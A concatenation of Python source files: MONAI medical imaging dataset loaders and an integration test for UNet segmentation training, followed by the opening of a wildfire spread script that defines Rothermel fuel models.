from typing import Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
from monai.apps.utils import download_and_extract
from monai.data import (
CacheDataset,
load_decathlon_datalist,
load_decathlon_properties,
partition_dataset,
select_cross_validation_folds,
)
from monai.transforms import LoadNiftid, LoadPNGd, Randomizable
from monai.utils import ensure_tuple
class MedNISTDataset(Randomizable, CacheDataset):
"""
The Dataset to automatically download MedNIST data and generate items for training, validation or test.
It's based on `CacheDataset` to accelerate the training process.
Args:
root_dir: target directory to download and load MedNIST dataset.
section: expected data section, can be: `training`, `validation` or `test`.
transform: transforms to execute operations on input data. the default transform is `LoadPNGd`,
which can load data into numpy array with [H, W] shape. for further usage, use `AddChanneld`
to convert the shape to [C, H, W, D].
download: whether to download and extract the MedNIST from resource link, default is False.
if the expected file already exists, downloading is skipped even if this is set to True.
user can manually copy `MedNIST.tar.gz` file or `MedNIST` folder to root directory.
seed: random seed to randomly split training, validation and test datasets, default is 0.
val_frac: fraction of the whole dataset to use for validation, default is 0.1.
test_frac: fraction of the whole dataset to use for testing, default is 0.1.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker threads to use.
if 0 a single thread will be used. Default is 0.
Raises:
ValueError: When ``root_dir`` is not a directory.
RuntimeError: When ``dataset_dir`` doesn't exist and downloading is not selected (``download=False``).
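Example (illustrative sketch; ``root_dir`` and ``section`` are user-supplied)::
data = MedNISTDataset(root_dir="./workspace", section="training", download=True, seed=0)
print(data[0]["image"].shape, data[0]["label"])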
"""
resource = "https://www.dropbox.com/s/5wwskxctvcxiuea/MedNIST.tar.gz?dl=1"
md5 = "0bc7306e7427e00ad1c5526a6677552d"
compressed_file_name = "MedNIST.tar.gz"
dataset_folder_name = "MedNIST"
def __init__(
self,
root_dir: str,
section: str,
transform: Union[Sequence[Callable], Callable] = (),
download: bool = False,
seed: int = 0,
val_frac: float = 0.1,
test_frac: float = 0.1,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: int = 0,
) -> None:
if not os.path.isdir(root_dir):
raise ValueError("Root directory root_dir must be a directory.")
self.section = section
self.val_frac = val_frac
self.test_frac = test_frac
self.set_random_state(seed=seed)
tarfile_name = os.path.join(root_dir, self.compressed_file_name)
dataset_dir = os.path.join(root_dir, self.dataset_folder_name)
if download:
download_and_extract(self.resource, tarfile_name, root_dir, self.md5)
if not os.path.exists(dataset_dir):
raise RuntimeError(
f"Cannot find dataset directory: {dataset_dir}, please use download=True to download it."
)
data = self._generate_data_list(dataset_dir)
if transform == ():
transform = LoadPNGd("image")
super().__init__(data, transform, cache_num=cache_num, cache_rate=cache_rate, num_workers=num_workers)
def randomize(self, data: Optional[Any] = None) -> None:
self.rann = self.R.random()
def _generate_data_list(self, dataset_dir: str) -> List[Dict]:
"""
Raises:
ValueError: When ``section`` is not one of ["training", "validation", "test"].
"""
class_names = sorted((x for x in os.listdir(dataset_dir) if os.path.isdir(os.path.join(dataset_dir, x))))
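# every subdirectory of MedNIST is a class; its position in the sorted list becomes the label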
num_class = len(class_names)
image_files = [
[
os.path.join(dataset_dir, class_names[i], x)
for x in os.listdir(os.path.join(dataset_dir, class_names[i]))
]
for i in range(num_class)
]
num_each = [len(image_files[i]) for i in range(num_class)]
image_files_list = []
image_class = []
for i in range(num_class):
image_files_list.extend(image_files[i])
image_class.extend([i] * num_each[i])
num_total = len(image_class)
data = list()
for i in range(num_total):
self.randomize()
if self.section == "training":
if self.rann < self.val_frac + self.test_frac:
continue
elif self.section == "validation":
if self.rann >= self.val_frac:
continue
elif self.section == "test":
if self.rann < self.val_frac or self.rann >= self.val_frac + self.test_frac:
continue
else:
raise ValueError(
f'Unsupported section: {self.section}, available options are ["training", "validation", "test"].'
)
data.append({"image": image_files_list[i], "label": image_class[i]})
return data
class DecathlonDataset(Randomizable, CacheDataset):
"""
The Dataset to automatically download the data of Medical Segmentation Decathlon challenge
(http://medicaldecathlon.com/) and generate items for training, validation or test.
It will also load these properties from the JSON config file of dataset. user can call `get_properties()`
to get specified properties or all the properties loaded.
It's based on :py:class:`monai.data.CacheDataset` to accelerate the training process.
Args:
root_dir: user's local directory for caching and loading the MSD datasets.
task: which task to download and execute: one of list ("Task01_BrainTumour", "Task02_Heart",
"Task03_Liver", "Task04_Hippocampus", "Task05_Prostate", "Task06_Lung", "Task07_Pancreas",
"Task08_HepaticVessel", "Task09_Spleen", "Task10_Colon").
section: expected data section, can be: `training`, `validation` or `test`.
transform: transforms to execute operations on input data. the default transform is `LoadNiftid`,
which can load Nifti format data into numpy array with [H, W, D] or [H, W, D, C] shape.
for further usage, use `AddChanneld` or `AsChannelFirstd` to convert the shape to [C, H, W, D].
download: whether to download and extract the Decathlon from resource link, default is False.
if the expected file already exists, downloading is skipped even if this is set to True.
val_frac: fraction of the whole dataset to use for validation, default is 0.2.
user can manually copy tar file or dataset folder to the root directory.
seed: random seed to randomly shuffle the datalist before splitting into training and validation, default is 0.
note to set same seed for `training` and `validation` sections.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker threads to use.
if 0 a single thread will be used. Default is 0.
Raises:
ValueError: When ``root_dir`` is not a directory.
ValueError: When ``task`` is not one of ["Task01_BrainTumour", "Task02_Heart",
"Task03_Liver", "Task04_Hippocampus", "Task05_Prostate", "Task06_Lung", "Task07_Pancreas",
"Task08_HepaticVessel", "Task09_Spleen", "Task10_Colon"].
RuntimeError: When ``dataset_dir`` doesn't exist and downloading is not selected (``download=False``).
Example::
transform = Compose(
[
LoadNiftid(keys=["image", "label"]),
AddChanneld(keys=["image", "label"]),
ScaleIntensityd(keys="image"),
ToTensord(keys=["image", "label"]),
]
)
val_data = DecathlonDataset(
root_dir="./", task="Task09_Spleen", transform=transform, section="validation", seed=12345, download=True
)
print(val_data[0]["image"], val_data[0]["label"])
"""
resource = {
"Task01_BrainTumour": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task01_BrainTumour.tar",
"Task02_Heart": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task02_Heart.tar",
"Task03_Liver": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task03_Liver.tar",
"Task04_Hippocampus": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task04_Hippocampus.tar",
"Task05_Prostate": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task05_Prostate.tar",
"Task06_Lung": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task06_Lung.tar",
"Task07_Pancreas": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task07_Pancreas.tar",
"Task08_HepaticVessel": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task08_HepaticVessel.tar",
"Task09_Spleen": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task09_Spleen.tar",
"Task10_Colon": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task10_Colon.tar",
}
md5 = {
"Task01_BrainTumour": "240a19d752f0d9e9101544901065d872",
"Task02_Heart": "06ee59366e1e5124267b774dbd654057",
"Task03_Liver": "a90ec6c4aa7f6a3d087205e23d4e6397",
"Task04_Hippocampus": "9d24dba78a72977dbd1d2e110310f31b",
"Task05_Prostate": "35138f08b1efaef89d7424d2bcc928db",
"Task06_Lung": "8afd997733c7fc0432f71255ba4e52dc",
"Task07_Pancreas": "4f7080cfca169fa8066d17ce6eb061e4",
"Task08_HepaticVessel": "641d79e80ec66453921d997fbf12a29c",
"Task09_Spleen": "410d4a301da4e5b2f6f86ec3ddba524e",
"Task10_Colon": "bad7a188931dc2f6acf72b08eb6202d0",
}
def __init__(
self,
root_dir: str,
task: str,
section: str,
transform: Union[Sequence[Callable], Callable] = (),
download: bool = False,
seed: int = 0,
val_frac: float = 0.2,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: int = 0,
) -> None:
if not os.path.isdir(root_dir):
raise ValueError("Root directory root_dir must be a directory.")
self.section = section
self.val_frac = val_frac
self.set_random_state(seed=seed)
if task not in self.resource:
raise ValueError(f"Unsupported task: {task}, available options are: {list(self.resource.keys())}.")
dataset_dir = os.path.join(root_dir, task)
tarfile_name = f"{dataset_dir}.tar"
if download:
download_and_extract(self.resource[task], tarfile_name, root_dir, self.md5[task])
if not os.path.exists(dataset_dir):
raise RuntimeError(
f"Cannot find dataset directory: {dataset_dir}, please use download=True to download it."
)
self.indices: np.ndarray = np.array([])
data = self._generate_data_list(dataset_dir)
# as `release` key has typo in Task04 config file, ignore it.
property_keys = [
"name",
"description",
"reference",
"licence",
"tensorImageSize",
"modality",
"labels",
"numTraining",
"numTest",
]
self._properties = load_decathlon_properties(os.path.join(dataset_dir, "dataset.json"), property_keys)
if transform == ():
transform = LoadNiftid(["image", "label"])
super().__init__(data, transform, cache_num=cache_num, cache_rate=cache_rate, num_workers=num_workers)
def get_indices(self) -> np.ndarray:
"""
Get the indices of datalist used in this dataset.
"""
return self.indices
def randomize(self, data: List[int]) -> None:
self.R.shuffle(data)
def get_properties(self, keys: Optional[Union[Sequence[str], str]] = None):
"""
Get the loaded properties of dataset with specified keys.
If no keys specified, return all the loaded properties.
"""
if keys is None:
return self._properties
elif self._properties is not None:
return {key: self._properties[key] for key in ensure_tuple(keys)}
else:
return {}
def _generate_data_list(self, dataset_dir: str) -> List[Dict]:
section = "training" if self.section in ["training", "validation"] else "test"
datalist = load_decathlon_datalist(os.path.join(dataset_dir, "dataset.json"), True, section)
return self._split_datalist(datalist)
def _split_datalist(self, datalist: List[Dict]) -> List[Dict]:
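# the shuffle below is driven by the seeded random state, so 'training' and 'validation'
# sections created with the same seed receive complementary, non-overlapping indices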
if self.section == "test":
return datalist
else:
length = len(datalist)
indices = np.arange(length)
self.randomize(indices)
val_length = int(length * self.val_frac)
if self.section == "training":
self.indices = indices[val_length:]
else:
self.indices = indices[:val_length]
return [datalist[i] for i in self.indices]
class CrossValidation:
"""
Cross validation dataset based on the general dataset which must have `_split_datalist` API.
Args:
dataset_cls: dataset class to be used to create the cross validation partitions.
It must have `_split_datalist` API.
nfolds: number of folds to split the data for cross validation.
seed: random seed to randomly shuffle the datalist before splitting into N folds, default is 0.
dataset_params: other additional parameters for the dataset_cls base class.
Example of 5 folds cross validation training::
cvdataset = CrossValidation(
dataset_cls=DecathlonDataset,
nfolds=5,
seed=12345,
root_dir="./",
task="Task09_Spleen",
section="training",
download=True,
)
dataset_fold0_train = cvdataset.get_dataset(folds=[1, 2, 3, 4])
dataset_fold0_val = cvdataset.get_dataset(folds=0)
# execute training for fold 0 ...
dataset_fold1_train = cvdataset.get_dataset(folds=[1])
dataset_fold1_val = cvdataset.get_dataset(folds=[0, 2, 3, 4])
# execute training for fold 1 ...
...
dataset_fold4_train = ...
# execute training for fold 4 ...
"""
def __init__(
self,
dataset_cls,
nfolds: int = 5,
seed: int = 0,
**dataset_params,
) -> None:
if not hasattr(dataset_cls, "_split_datalist"):
raise ValueError("dataset class must have _split_datalist API.")
self.dataset_cls = dataset_cls
self.nfolds = nfolds
self.seed = seed
self.dataset_params = dataset_params
def get_dataset(self, folds: Union[Sequence[int], int]):
"""
Generate the dataset for the specified fold indices in the cross validation group.
Args:
folds: index of folds for training or validation, if a list of values, concatenate the data.
"""
nfolds = self.nfolds
seed = self.seed
class _NsplitsDataset(self.dataset_cls): # type: ignore
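# subclass the wrapped dataset on the fly: its datalist is partitioned into `nfolds`
# shuffled splits and then narrowed to the requested fold indices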
def _split_datalist(self, datalist: List[Dict]) -> List[Dict]:
data = partition_dataset(data=datalist, num_partitions=nfolds, shuffle=True, seed=seed)
return select_cross_validation_folds(partitions=data, folds=folds)
return _NsplitsDataset(**self.dataset_params)
```
#### File: MONAI/tests/test_integration_workflows.py
```python
import logging
import os
import shutil
import sys
import tempfile
import unittest
from glob import glob
import nibabel as nib
import numpy as np
import torch
from ignite.metrics import Accuracy
import monai
from monai.data import create_test_image_3d
from monai.engines import SupervisedEvaluator, SupervisedTrainer
from monai.handlers import (
CheckpointLoader,
CheckpointSaver,
LrScheduleHandler,
MeanDice,
SegmentationSaver,
StatsHandler,
TensorBoardImageHandler,
TensorBoardStatsHandler,
ValidationHandler,
)
from monai.inferers import SimpleInferer, SlidingWindowInferer
from monai.transforms import (
Activationsd,
AsChannelFirstd,
AsDiscreted,
Compose,
KeepLargestConnectedComponentd,
LoadNiftid,
RandCropByPosNegLabeld,
RandRotate90d,
ScaleIntensityd,
ToTensord,
)
from monai.utils import set_determinism
from tests.utils import skip_if_quick
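# builds a supervised 3D UNet training workflow on the synthetic Nifti volumes created in setUp:
# cached datasets, sliding-window validation every 2 epochs, TensorBoard logging and best-metric checkpointing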
def run_training_test(root_dir, device="cuda:0", amp=False):
images = sorted(glob(os.path.join(root_dir, "img*.nii.gz")))
segs = sorted(glob(os.path.join(root_dir, "seg*.nii.gz")))
train_files = [{"image": img, "label": seg} for img, seg in zip(images[:20], segs[:20])]
val_files = [{"image": img, "label": seg} for img, seg in zip(images[-20:], segs[-20:])]
# define transforms for image and segmentation
train_transforms = Compose(
[
LoadNiftid(keys=["image", "label"]),
AsChannelFirstd(keys=["image", "label"], channel_dim=-1),
ScaleIntensityd(keys=["image", "label"]),
RandCropByPosNegLabeld(
keys=["image", "label"], label_key="label", spatial_size=[96, 96, 96], pos=1, neg=1, num_samples=4
),
RandRotate90d(keys=["image", "label"], prob=0.5, spatial_axes=[0, 2]),
ToTensord(keys=["image", "label"]),
]
)
val_transforms = Compose(
[
LoadNiftid(keys=["image", "label"]),
AsChannelFirstd(keys=["image", "label"], channel_dim=-1),
ScaleIntensityd(keys=["image", "label"]),
ToTensord(keys=["image", "label"]),
]
)
# create a training data loader
train_ds = monai.data.CacheDataset(data=train_files, transform=train_transforms, cache_rate=0.5)
# use batch_size=2 to load images and use RandCropByPosNegLabeld to generate 2 x 4 images for network training
train_loader = monai.data.DataLoader(train_ds, batch_size=2, shuffle=True, num_workers=4)
# create a validation data loader
val_ds = monai.data.CacheDataset(data=val_files, transform=val_transforms, cache_rate=1.0)
val_loader = monai.data.DataLoader(val_ds, batch_size=1, num_workers=4)
# create UNet, DiceLoss and Adam optimizer
net = monai.networks.nets.UNet(
dimensions=3,
in_channels=1,
out_channels=1,
channels=(16, 32, 64, 128, 256),
strides=(2, 2, 2, 2),
num_res_units=2,
).to(device)
loss = monai.losses.DiceLoss(sigmoid=True)
opt = torch.optim.Adam(net.parameters(), 1e-3)
lr_scheduler = torch.optim.lr_scheduler.StepLR(opt, step_size=2, gamma=0.1)
val_post_transforms = Compose(
[
Activationsd(keys="pred", sigmoid=True),
AsDiscreted(keys="pred", threshold_values=True),
KeepLargestConnectedComponentd(keys="pred", applied_labels=[1]),
]
)
val_handlers = [
StatsHandler(output_transform=lambda x: None),
TensorBoardStatsHandler(log_dir=root_dir, output_transform=lambda x: None),
TensorBoardImageHandler(
log_dir=root_dir, batch_transform=lambda x: (x["image"], x["label"]), output_transform=lambda x: x["pred"]
),
CheckpointSaver(save_dir=root_dir, save_dict={"net": net}, save_key_metric=True),
]
evaluator = SupervisedEvaluator(
device=device,
val_data_loader=val_loader,
network=net,
inferer=SlidingWindowInferer(roi_size=(96, 96, 96), sw_batch_size=4, overlap=0.5),
post_transform=val_post_transforms,
key_val_metric={
"val_mean_dice": MeanDice(include_background=True, output_transform=lambda x: (x["pred"], x["label"]))
},
additional_metrics={"val_acc": Accuracy(output_transform=lambda x: (x["pred"], x["label"]))},
val_handlers=val_handlers,
amp=True if amp else False,
)
train_post_transforms = Compose(
[
Activationsd(keys="pred", sigmoid=True),
AsDiscreted(keys="pred", threshold_values=True),
KeepLargestConnectedComponentd(keys="pred", applied_labels=[1]),
]
)
train_handlers = [
LrScheduleHandler(lr_scheduler=lr_scheduler, print_lr=True),
ValidationHandler(validator=evaluator, interval=2, epoch_level=True),
StatsHandler(tag_name="train_loss", output_transform=lambda x: x["loss"]),
TensorBoardStatsHandler(log_dir=root_dir, tag_name="train_loss", output_transform=lambda x: x["loss"]),
CheckpointSaver(save_dir=root_dir, save_dict={"net": net, "opt": opt}, save_interval=2, epoch_level=True),
]
trainer = SupervisedTrainer(
device=device,
max_epochs=5,
train_data_loader=train_loader,
network=net,
optimizer=opt,
loss_function=loss,
inferer=SimpleInferer(),
post_transform=train_post_transforms,
key_train_metric={"train_acc": Accuracy(output_transform=lambda x: (x["pred"], x["label"]))},
train_handlers=train_handlers,
amp=True if amp else False,
)
trainer.run()
return evaluator.state.best_metric
def run_inference_test(root_dir, model_file, device="cuda:0", amp=False):
images = sorted(glob(os.path.join(root_dir, "im*.nii.gz")))
segs = sorted(glob(os.path.join(root_dir, "seg*.nii.gz")))
val_files = [{"image": img, "label": seg} for img, seg in zip(images, segs)]
# define transforms for image and segmentation
val_transforms = Compose(
[
LoadNiftid(keys=["image", "label"]),
AsChannelFirstd(keys=["image", "label"], channel_dim=-1),
ScaleIntensityd(keys=["image", "label"]),
ToTensord(keys=["image", "label"]),
]
)
# create a validation data loader
val_ds = monai.data.Dataset(data=val_files, transform=val_transforms)
val_loader = monai.data.DataLoader(val_ds, batch_size=1, num_workers=4)
# create UNet, DiceLoss and Adam optimizer
net = monai.networks.nets.UNet(
dimensions=3,
in_channels=1,
out_channels=1,
channels=(16, 32, 64, 128, 256),
strides=(2, 2, 2, 2),
num_res_units=2,
).to(device)
val_post_transforms = Compose(
[
Activationsd(keys="pred", sigmoid=True),
AsDiscreted(keys="pred", threshold_values=True),
KeepLargestConnectedComponentd(keys="pred", applied_labels=[1]),
]
)
val_handlers = [
StatsHandler(output_transform=lambda x: None),
CheckpointLoader(load_path=f"{model_file}", load_dict={"net": net}),
SegmentationSaver(
output_dir=root_dir,
batch_transform=lambda batch: batch["image_meta_dict"],
output_transform=lambda output: output["pred"],
),
]
evaluator = SupervisedEvaluator(
device=device,
val_data_loader=val_loader,
network=net,
inferer=SlidingWindowInferer(roi_size=(96, 96, 96), sw_batch_size=4, overlap=0.5),
post_transform=val_post_transforms,
key_val_metric={
"val_mean_dice": MeanDice(include_background=True, output_transform=lambda x: (x["pred"], x["label"]))
},
additional_metrics={"val_acc": Accuracy(output_transform=lambda x: (x["pred"], x["label"]))},
val_handlers=val_handlers,
amp=True if amp else False,
)
evaluator.run()
return evaluator.state.best_metric
class IntegrationWorkflows(unittest.TestCase):
def setUp(self):
set_determinism(seed=0)
self.data_dir = tempfile.mkdtemp()
for i in range(40):
im, seg = create_test_image_3d(128, 128, 128, num_seg_classes=1, channel_dim=-1)
n = nib.Nifti1Image(im, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"img{i:d}.nii.gz"))
n = nib.Nifti1Image(seg, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"seg{i:d}.nii.gz"))
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu:0")
monai.config.print_config()
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def tearDown(self):
set_determinism(seed=None)
shutil.rmtree(self.data_dir)
@skip_if_quick
def test_training(self):
repeated = []
test_rounds = 3 if monai.config.get_torch_version_tuple() >= (1, 6) else 2
for i in range(test_rounds):
set_determinism(seed=0)
repeated.append([])
best_metric = run_training_test(self.data_dir, device=self.device, amp=(i == 2))
print("best metric", best_metric)
if i == 2:
np.testing.assert_allclose(best_metric, 0.9219996750354766, rtol=1e-2)
else:
np.testing.assert_allclose(best_metric, 0.921965891122818, rtol=1e-2)
repeated[i].append(best_metric)
model_file = sorted(glob(os.path.join(self.data_dir, "net_key_metric*.pt")))[-1]
infer_metric = run_inference_test(self.data_dir, model_file, device=self.device, amp=(i == 2))
print("infer metric", infer_metric)
# check inference properties
if i == 2:
np.testing.assert_allclose(infer_metric, 0.9217855930328369, rtol=1e-2)
else:
np.testing.assert_allclose(infer_metric, 0.9217526227235794, rtol=1e-2)
repeated[i].append(infer_metric)
output_files = sorted(glob(os.path.join(self.data_dir, "img*", "*.nii.gz")))
if i == 2:
sums = [
0.14183807373046875,
0.15151405334472656,
0.13811445236206055,
0.1336650848388672,
0.1842341423034668,
0.16353750228881836,
0.14104795455932617,
0.16643333435058594,
0.15668964385986328,
0.1764383316040039,
0.16112232208251953,
0.1641840934753418,
0.14401578903198242,
0.11075973510742188,
0.16075706481933594,
0.19603967666625977,
0.1743607521057129,
0.05361223220825195,
0.19009971618652344,
0.19875097274780273,
0.19498729705810547,
0.2027440071105957,
0.16035127639770508,
0.13188838958740234,
0.15143728256225586,
0.1370086669921875,
0.22630071640014648,
0.16111421585083008,
0.14713764190673828,
0.10443782806396484,
0.11977195739746094,
0.13068008422851562,
0.11225223541259766,
0.15175437927246094,
0.1594991683959961,
0.1894702911376953,
0.21605825424194336,
0.17748403549194336,
0.18474626541137695,
0.03627157211303711,
]
else:
sums = [
0.14183568954467773,
0.15139484405517578,
0.13803958892822266,
0.13356733322143555,
0.18455982208251953,
0.16363763809204102,
0.14090299606323242,
0.16649341583251953,
0.15651702880859375,
0.17655181884765625,
0.1611647605895996,
0.1644759178161621,
0.14383649826049805,
0.11055231094360352,
0.16080236434936523,
0.19629907608032227,
0.17441368103027344,
0.053577423095703125,
0.19043731689453125,
0.19904851913452148,
0.19525957107543945,
0.20304203033447266,
0.16030073165893555,
0.13170528411865234,
0.15118885040283203,
0.13686418533325195,
0.22668886184692383,
0.1611466407775879,
0.1472468376159668,
0.10427331924438477,
0.11962461471557617,
0.1305699348449707,
0.11204767227172852,
0.15171241760253906,
0.1596231460571289,
0.18976259231567383,
0.21649408340454102,
0.17761707305908203,
0.1851673126220703,
0.036365509033203125,
]
for (output, s) in zip(output_files, sums):
ave = np.mean(nib.load(output).get_fdata())
np.testing.assert_allclose(ave, s, rtol=1e-2)
repeated[i].append(ave)
np.testing.assert_allclose(repeated[0], repeated[1])
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "johodges/datadriven-wildfire-spread",
"score": 2
} |
#### File: datadriven-wildfire-spread/scripts/behavePlus.py
```python
import numpy as np
import matplotlib
matplotlib.rcParams['ps.useafm'] = True
matplotlib.rcParams['pdf.use14corefonts'] = True
#matplotlib.rcParams['text.usetex'] = True
import matplotlib.pyplot as plt
from matplotlib.offsetbox import OffsetImage, AnnotationBbox # used by manyFiresInputFigure
from PIL import Image, ImageDraw
from scipy.ndimage.interpolation import zoom
import pandas as pd
import util_common as uc
import os
class FuelModel(object):
''' This class contains a fuel model for wildfire spread.
Fields:
    id, code, name: identifiers of the fuel model
    fuelBedDepth, moistureOfExtinctionDeadFuel,
    heatOfCombustionDeadFuel, heatOfCombustionLiveFuel,
    fuelLoad1Hour, fuelLoad10Hour, fuelLoad100Hour,
    fuelLoadLiveHerb, fuelLoadLiveWood,
    savr1HourFuel, savrLiveHerb, savrLiveWood,
    isDynamic, isReserved
Functions:
    __str__, __repr__: return a short summary of the model
'''
__slots__ = ['id','code','name',
'fuelBedDepth','moistureOfExtinctionDeadFuel','heatOfCombustionDeadFuel','heatOfCombustionLiveFuel',
'fuelLoad1Hour','fuelLoad10Hour','fuelLoad100Hour','fuelLoadLiveHerb','fuelLoadLiveWood',
'savr1HourFuel','savrLiveHerb','savrLiveWood',
'isDynamic','isReserved']
def __init__(self,idNumber,idCode,idName,
fuelBedDepth,moistureOfExtinctionDeadFuel,heatOfCombustionDeadFuel,heatOfCombustionLiveFuel,
fuelLoad1Hour,fuelLoad10Hour,fuelLoad100Hour,fuelLoadLiveHerb,fuelLoadLiveWood,
savr1HourFuel,savrLiveHerb,savrLiveWood,
isDynamic, isReserved):
self.id = idNumber
self.code = idCode
self.name = idName
self.fuelBedDepth = fuelBedDepth
self.moistureOfExtinctionDeadFuel = moistureOfExtinctionDeadFuel
self.heatOfCombustionDeadFuel = heatOfCombustionDeadFuel
self.heatOfCombustionLiveFuel = heatOfCombustionLiveFuel
self.fuelLoad1Hour = fuelLoad1Hour
self.fuelLoad10Hour = fuelLoad10Hour
self.fuelLoad100Hour = fuelLoad100Hour
self.fuelLoadLiveHerb = fuelLoadLiveHerb
self.fuelLoadLiveWood = fuelLoadLiveWood
self.savr1HourFuel = savr1HourFuel
self.savrLiveHerb = savrLiveHerb
self.savrLiveWood = savrLiveWood
self.isDynamic = isDynamic
self.isReserved = isReserved
def __str__(self):
''' Returns summary information about the fuel model when a string
representation is requested.
'''
string = "Fuel Model\n"
string = string + "\tID:\t\t%s\n"%(str(self.id))
string = string + "\tCode:\t%s\n"%(str(self.code))
string = string + "\tName:\t%s\n"%(str(self.name))
return string
def __repr__(self):
''' Returns the same summary as __str__.
'''
return self.__str__()
class lifeStateIntermediate(object):
__slots__ = ['dead','live']
def __init__(self,fuelModel,moistureDead,moistureLive):
savrDead, savrLive = getSAV(fuelModel)
deadFraction, liveFraction, deadFractionTotal, liveFractionTotal = getDLFraction(fuelModel,moistureLive)
loadDead, loadLive = getFuelLoad(fuelModel,moistureLive)
heatCDead, heatCLive = getHeatOfCombustion(fuelModel)
heatDead = np.zeros((len(savrDead),))+heatCDead
heatLive = np.zeros((len(savrLive),))+heatCLive
# Caution: liveFraction is a plain list here, so (liveFraction == 0) evaluates
# to False (i.e. index 0) and this line zeroes heatLive[0] rather than masking
# the classes whose live fraction is zero.
heatLive[liveFraction == 0] = 0
# Pad the live moisture list in place to four size classes so the weighted
# sums below (and getHeatSink later) can index it like the dead list.
moistureLive.extend([0,0])
self.dead = self.calculateIntermediates(fuelModel,savrDead,loadDead,deadFraction,heatDead,moistureDead)
self.live = self.calculateIntermediates(fuelModel,savrLive,loadLive,liveFraction,heatLive,moistureLive)
def calculateIntermediates(self,fuelModel,savr,load,fraction,heat,moisture):
totalSilicaContent = 0.0555 # Rothermel 1972
silicaEffective = np.zeros((len(savr),))+0.01 # From behavePlus source, should be 0 if no fuel
wn = np.zeros((len(savr),))
weightedHeat = 0.0
weightedSilica = 0.0
weightedMoisture = 0.0
weightedSavr = 0.0
totalLoadForLifeState = 0.0
"""
for i in range(0,len(moisture)):
wn[i] = load[i]*(1.0-totalSilicaContent)
weightedHeat = weightedHeat + fraction[i] * heat[i]
weightedSilica = weightedSilica + fraction[i] * silicaEffective
weightedMoisture = weightedMoisture + fraction[i]*moisture[i]
weightedSavr = weightedSavr + fraction[i] * savr[i]
totalLoadForLifeState = totalLoadForLifeState + load[i]
"""
#print(fraction,moisture)
wn = [x*(1.0-totalSilicaContent) for x in load] #wn[i] = load[i]*(1.0-totalSilicaContent)
weightedHeat = np.dot(fraction,heat) #weightedHeat = weightedHeat + fraction[i] * heat[i]
weightedSilica = np.dot(fraction,silicaEffective) #weightedSilica = weightedSilica + fraction[i] * silicaEffective
weightedMoisture = np.dot(fraction,moisture) #weightedMoisture = weightedMoisture + fraction[i]*moisture[i]
weightedSavr = np.dot(fraction,savr) #weightedSavr = weightedSavr + fraction[i] * savr[i]
totalLoadForLifeState = np.sum(load) #totalLoadForLifeState = totalLoadForLifeState + load[i]
if fuelModel.isDynamic and False:
weightedFuelLoad = np.sum(wn) # This gives better agreement with
# behavePlus for dynamic fuel models;
# however, the source code for
# BehavePlus shows this should be
# weightedFuelLoad=np.dot(fraction,wn)
else:
weightedFuelLoad = np.dot(wn,fraction)
# Index order used downstream: [0]=weighted heat, [1]=weighted effective silica,
# [2]=weighted moisture, [3]=weighted SAV ratio, [4]=total load for the life state,
# [5]=weighted fuel load
return [weightedHeat,weightedSilica,weightedMoisture,weightedSavr,totalLoadForLifeState,weightedFuelLoad]
def buildFuelModels(allowDynamicModels=True,allowNonBurningModels=False):
"""
fuelModelNumber, code, name
fuelBedDepth, moistureOfExtinctionDeadFuel, heatOfCombustionDeadFuel, heatOfCombustionLiveFuel,
fuelLoad1Hour, fuelLoad10Hour, fuelLoad100Hour, fuelLoadLiveHerb, fuelLoadLiveWood,
savr1HourFuel, savrLiveHerb, savrLiveWood,
isDynamic, isReserved
- WMC 10/2015
"""
fuelModels = dict()
# Code FMx: Original 13 Fuel Models
fuelModels["FM1"] = FuelModel(
1, "FM1", "Short grass [1]",
1.0, 0.12, 8000, 8000,
0.034, 0, 0, 0, 0,
3500, 1500, 1500,
False, True)
fuelModels["FM2"] = FuelModel(
2, "FM2", "Timber grass and understory [2]",
1.0, 0.15, 8000, 8000,
0.092, 0.046, 0.023, 0.023, 0,
3000, 1500, 1500,
False, True)
fuelModels["FM3"] = FuelModel(
3, "FM3", "Tall grass [3]",
2.5, 0.25, 8000, 8000,
0.138, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["FM4"] = FuelModel(
4, "FM4", "Chaparral [4]",
6.0, 0.2, 8000, 8000,
0.230, 0.184, 0.092, 0, 0.230,
2000, 1500, 1500,
False, True)
fuelModels["FM5"] = FuelModel(
5, "FM5", "Brush [5]",
2.0, 0.20, 8000, 8000,
0.046, 0.023, 0, 0, 0.092,
2000, 1500, 1500,
False, True)
fuelModels["FM6"] = FuelModel(
6, "FM6", "Dormant brush, hardwood slash [6]",
2.5, 0.25, 8000, 8000,
0.069, 0.115, 0.092, 0, 0,
1750, 1500, 1500,
False, True)
fuelModels["FM7"] = FuelModel(
7, "FM7", "Southern rough [7]",
2.5, 0.40, 8000, 8000,
0.052, 0.086, 0.069, 0, 0.017,
1750, 1500, 1500,
False, True)
fuelModels["FM8"] = FuelModel(
8, "FM8", "Short needle litter [8]",
0.2, 0.3, 8000, 8000,
0.069, 0.046, 0.115, 0, 0,
2000, 1500, 1500,
False, True)
fuelModels["FM9"] = FuelModel(
9, "FM9", "Long needle or hardwood litter [9]",
0.2, 0.25, 8000, 8000,
